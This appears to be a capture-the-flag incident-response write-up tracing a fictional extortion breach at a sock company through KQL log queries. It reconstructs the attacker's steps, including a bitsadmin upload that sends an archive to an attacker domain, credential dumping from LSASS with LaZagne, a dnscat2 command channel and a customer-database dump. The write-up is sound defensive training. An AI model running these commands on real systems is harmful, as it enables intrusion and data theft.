Section 1 - Sock Savior

There was a meeting with the Jus de Chaussette staff regarding an alleged data breach they've suffered. According to an executive, they were sent an email--projected during the meeting--by a threat actor calling itself "The Sock Puppet Empire", which might be a pun on both Jus de Chaussette's leading product and online sock puppet accounts; they threaten to leak controversial information (allegedly dishonest practices involving outsourced labor) found while snooping the company's intranet and emails, and demand 2M EUR within the next 24 hours in exchange for their silence in the matter. The email's information is truncated except for its subject line and body, replicated below:

Pay up or the world will know your lies
Bonjour,
You, my dears, have been naughty. Lying is not a good look, non, non 😔

What would your lovely customers think of that? Such cruel betrayal. Maybe we ought to warn them 🤔? Show them the proof we found while snooping around your systems 🕵🏻?

Cover, you could buy our silence 🤫 For the very modest sum of 2,000,000€, your misbehaving will be our little secret, pinky swear.
If we haven't heard from you in the next 24 hours, we'll introduce your Indian friends to your customers. We bet your shareholders will be delighted 💸.
Tic tac, tic tac.

Yours truly,

The Sock Puppet Empire

Knowing the subject line is a good starting point for the investigation.

Email
| where subject =~ 'Pay up or the world will know your lies'

Three emails, all sent at exactly the same time (twice to the same recipient). There are no outbound links or attachments according to the logs. The sender is theempireownsyou@proton.me and--following a quick lookup on the Employees table--the recipients are Cho Cetkipu (Chief Executive Officer) and Brooke Entoe (Chief Financial Officer). There are no other emails from this sender.

Since the threat actor outright admits to have stolen information--sensitive information regarding internal operations, particularly implying that the French-made socks aren't truly French--it wouldn't hurt to check if there are any suspicious processes in the CFO's and CEO's corporate devices.

Email
| where subject =~ 'Pay up or the world will know your lies'
| distinct recipient
| lookup Employees on $left.recipient == $right.email_addr
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp between (datetime(2024-08-30) .. datetime(2024-08-31))
and process_commandline !contains "WindowsApps" //get rid of the chaff
and process_commandline !contains "SystemApps" //get rid of the chaff
and process_commandline !contains "Edge" //get rid of the chaff
and process_commandline !contains "Teams" //get rid of the chaff
| sort by hostname, timestamp asc

The first command they run is net use Z: \\Server\Contracts\Hidden in order to connect to the intranet's hidden contracts directory, assigning it the drive letter Z: [Microsoft Learn]. Then, they use xcopy to recursively copy all the contents of said directory to the notfrench directory, located in the target's Downloads directory; the flags used are:

• /h: Copies files with hidden and system file attributes. By default, xcopy doesn't copy hidden or system files.
• /s: Copies directories and subdirectories, unless they're empty. If you omit /s, xcopy works within a single directory.
• /q: Suppresses the display of xcopy messages.

[Microsoft Learn]. This is followed by the rar command with a specific set of switches: rar a -df -hp sn3@ky, meaning, in order:

• a: a command, per WinRAR's docs, to add files to an archive.
• -df: a switch, per WinRAR's docs, to delete files after archiving.
• -hp: a switch, per WinRAR's docs, to encrypt both file data and headers. The password is sn3@ky.

The resulting archive is lies.rar. Now, with their desired information packaged and ready to go, they use a command I hadn't seen used before: bitsadmin, which refers to Windows' built-in Background Intelligent Transfer Service (BITS). It can create, upload, download and monitor jobs [Microsoft Learn]. In order:

1. bitsadmin /create stomping: create a job called stomping
2. bitsadmin /transfer stomping /upload https://liarliarsocksonfire.net/wegotthegoods/lies.rar C:\Users\brentoe\downloads\lies.rar: Transfer one or more files. [Microsoft Learn]. The type of transfer is an upload i.e. exfiltrate the data to the threat actor's servers
3. bitsadmin /complete stomping: set the job as complete, making all files available. [Microsoft Learn]

To reveal more of the threat actor's infrastructure, I do a series of recursive lookups against the PassiveDns table:

PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain

The threat actor has two distinct domains; further recursive lookups do not reveal any others. These domains, in turn, lead to these IP addresses:

PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip

The threat actor has three distinct IP addresses; further recursive lookups do not reveal any others.

Before checking if anyone else has strange processes on their devices, I wanted to take a look at any possible connections made by these IP addresses (or to these domains). I'll start with checking for any emails containing links to this domain:

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
Email
| where tostring(parse_url(link).Host) in (bad_domains)

Quite worriesome; Customer Service Pinky Toe Mike Oz--as confirmed with a lookup on the Employees table--sent phishing emails with download links to malicious documents; the domain is related to the threat actor (see [3] above). While there is always the possibility of an insider threat, it's just as likely (if not more so) that Mike Oz had his corporate account compromised. The affected users were CFO Brooke Entoe and CEO Cho Cetkipu.

Before examining Mike Oz further, I'll continue with the OutboundNetworkEvents table.

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| lookup Employees on $left.src_ip == $right.ip_addr
| distinct timestamp, method, src_ip, role, name, user_agent, url

This unfortunately confirms that the CEO and CFO both clicked the link, and very likely downloaded the file and opened it. Before examining this further, I'd like to check on Mike Oz's device or emails for signs of threat actor activity; but before that, I want to check the InboundNetworkEvents table for any hints of recon the threat actors might've engaged in before this attack.

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
InboundNetworkEvents
| where src_ip in (bad_ips)

The queries are for a variety of things, including casting doubt on the quality of Jus de Chaussette's product, checking articles on the French President's endorsement of the brand, how to file a complaint, how to contact customer service (which would include Mike Oz), trying to find the customer database or any customer PII in the Jus de Chaussette servers, and any mailing lists the company may have. They eventually find a link to a Contact Form, in which they upload a file named holesinmysocks.jpeg on 2024-08-18 at 14:02:52 in the afternoon--the day before "Mike Oz" sent the first email to the CFO. Even after that, there are queries questioning the sourcing of the cotton used for manufacturing the socks.

With such a clear hint of what happened, I checked what happened in Mike Oz's device around the time the holesinmysocks.jpeg file was downloaded to their computer--since their account was compromised, it's likely because this file dropped something on their computer.

ProcessEvents
| where username == "mioz"
| where timestamp >= datetime(2024-08-18 14:02:52.0000)
| where process_commandline !contains "Edge"
and process_commandline !contains "Teams"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "SystemApps"

This file turns out not to be an image file at all, but rather a text file masquerading as one. After the target opens the malicious .jpeg file...

1. ...a PowerShell script is dropped (named talking_socks.ps1, as confirmed in FileCreationEvents) and executed.
2. This, in turn, downloads, extracts and executes dnscat2 from downloads.skullsecurity.org. This is a legitimate tool by Ron Bowes (iagox86 on GitHub), described on its GitHub page as a tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network; the tool is used to create said encrypted C2 channel on Mike Oz's computer, granting hands-on-keyboard access.
3. They use this access to first run whoami, a discovery command.
4. This is followed by downloading LaZagne off its Github page in the same manner as dnscat2. This is an open source application used to retrieve lots of passwords stored on a local computer.
5. They follow this by a standard set of discovery commands: net user, net view, net share, wmic product get name, the latter gets the name of all installed software; wmic was a command line tool for Windows Management Instrumentation (WMI) [Microsoft Learn], and using this command, they can learn things such as database software being used.
6. Afterwards, they use LaZagne to dump credentials for the databases and any credentials off LSASS (Local Security Authority Server Service), which saves credentials in memory [Microsoft Learn].
7. Finally, they run dbviscmd.bat (a legitimate command line interface for DbVisualizer) to dump the Customers database contents to a file named Customers.csv, which is likely full of sensitive data.

Afterwards, they use the same rar as before (see [2]) to compress and encrypt the file before uploading it to their server using bitsadmin.

Since there are no other signs of activity in Mike Oz's computer, it's time to pivot to checking the CFO and CEO's devices, seeing how they downloaded malicious files sent by "Mike Oz" (see [6]).

FileCreationEvents
| where filename =~ "decision.docx"

Indeed, the decision.docx file drops the same PowerShell script, though this time the threat actors seem mostly content to just dump the credentials using LaZagne. There are no further signs of activity until 2024-08-30 at 18:50:58 in the afternoon, when the threat actors return and use their hands-on-keyboard access to exfiltrate information from the CFO and CEO's computers and the Jus de Chaussette servers--likely documents only the CEO and CFO would have access to (see [2]).

In brief:

• The threat actors engaged in recon using Jus de Chaussette's own website, particularly focusing on how to contact customer service, any information they could exploit for phishing emails (such as the French president's endorsement of Jus de Chaussette's socks), and any suspicious or controversial information regarding the company. They used three distinct IP addresses during this operation.
• They gained initial access by using the customer service contact form to upload a malicious dropper masquerading as a .jpeg file.
• Customer Service Representative Mike Oz took on the case, opened the file, and had a .ps1 file dropped and executed on his device.
• Said PowerShell script downloaded, installed and executed dnscat2 and LaZagne.
• dnscat2 was used to establish a connection to the attacker's command and control server and gain hands-on-keyboard access.
• LaZagne was used to dump credentials from LSASS, including credentials for the customer database and the corporate mailbox.
• The attackers dumped the contents of the customer database to a .csv file in a staging folder, which they later compressed, encrypted and uploaded to their server.
• Using Mike Oz's email account, they sent internal phishing emails to CEO Cho Cetkipu and CFO Brooke Entoe with a link to download a malicious .docx file.
• The process is repeated; the PowerShell script is dropped and executed, the attackers establish a connection to their servers with dnscat2 and dump credentials with LaZagne.
• Some time later, they connect to the intranet and download sensitive corporate information from it.
• Finally, they send the extortion email from an external email address.